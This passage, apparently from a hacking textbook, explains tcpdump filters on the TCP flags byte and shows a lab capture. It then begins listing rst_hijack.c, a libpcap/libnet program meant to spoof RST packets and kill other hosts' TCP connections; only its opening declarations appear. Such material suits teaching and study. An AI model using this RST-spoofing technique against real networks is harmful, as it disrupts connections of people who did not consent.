flags are found in the following order, from left to right: URG, ACK, PSH,
RST, SYN, and FIN. These six flags occupy the low six bits of the octet; the
two bits above them are the ECN bits CWR and ECE (RFC 3168), which are not
among the six flags but can be set on a SYN from an ECN-capable host, so a
filter that compares the whole octet for equality can miss such packets. If
only the ACK flag is turned on, the 13th octet is 00010000 in binary, which
is 16 in decimal. If both SYN and ACK are turned on, the 13th octet is
00010010 in binary, which is 18 in decimal.
To create a filter that matches whenever the ACK flag is turned on, without
caring about any of the other bits, the bitwise AND operator is used. ANDing
00010010 with 00010000 produces 00010000, since the ACK bit is the only
position where both operands are 1. This means that a filter of
tcp[13] & 16 == 16 will match the packets where the ACK flag is turned on,
regardless of the state of the remaining flags. A plain tcp[13] == 16 would
not: it matches only a bare ACK and rejects the SYN/ACK (18) above.
This filter rule can be rewritten using the named values and inverted logic as
tcp[tcpflags] & tcp-ack != 0. This is easier to read and gives the same
result. This rule can be combined with the previous destination IP rule using
and; the full rule is shown below.
reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host 192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92 <nop,nop,timestamp 85838571 0>
10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 <nop,nop,timestamp 85838621 29399>
10:19:47.770322 IP 192.168.42.72.40238 > 192.168.42.88.22: P 0:20(20) ack 22 win 92 <nop,nop,timestamp 85838621 29399>
10:19:47.771536 IP 192.168.42.72.40238 > 192.168.42.88.22: P 20:732(712) ack 766 win 115 <nop,nop,timestamp 85838622 29399>
10:19:47.918866 IP 192.168.42.72.40238 > 192.168.42.88.22: P 732:756(24) ack 766 win 115 <nop,nop,timestamp 85838659 29402>
A similar rule is used in the following program to filter the packets
libpcap sniffs. When the program gets a packet, the header information is
used to spoof an RST packet. This program will be explained as it's listed.
rst_hijack.c
#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);

/* State handed to the pcap callback through its u_char * user argument. */
struct data_pass {
   int libnet_handle;   /* libnet raw socket used to send the spoofed RST */
   u_char *packet;      /* buffer the RST packet is built in */
};

int main(int argc, char *argv[]) {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   pcap_t *pcap_handle;